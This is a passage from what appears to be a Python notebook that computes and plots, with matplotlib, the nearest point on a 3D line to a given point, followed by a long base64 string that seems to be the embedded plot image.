    # integer truncation if this ever runs under Python 2.
    c = my_scalar_product(a, b) / float(my_scalar_product(a, a))
    # Bug fix: the original returned c*a without adding the anchor point
    # back, which is only correct when point_on_line is the origin
    # (the one case exercised by the demo cell below).
    nearest_point_on_line = [point_on_line[0] + c * a[0],
                             point_on_line[1] + c * a[1],
                             point_on_line[2] + c * a[2]]
    return nearest_point_on_line
# +
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
# %matplotlib notebook
# Demo: find and plot the point on the line (through p, direction n)
# that is closest to other_point.
p=(0,0,0) # the two parameters defining the line: a point on it ...
n=(1,1,1) # ... and its direction vector
other_point=[1,2,7] # the query point
n_p=point_on_line(n,p,other_point) # n_p is the nearest point to us on the line
points=draw_my_line(n,p) # sampled line coordinates for plotting
ax=plt.axes(projection='3d')
ax.plot3D(points[0],points[1],points[2],'pink')
ax.scatter(other_point[0],other_point[1],other_point[2],'*')
ax.scatter(n_p[0],n_p[1],n_p[2],'*')
plt.show()
# -
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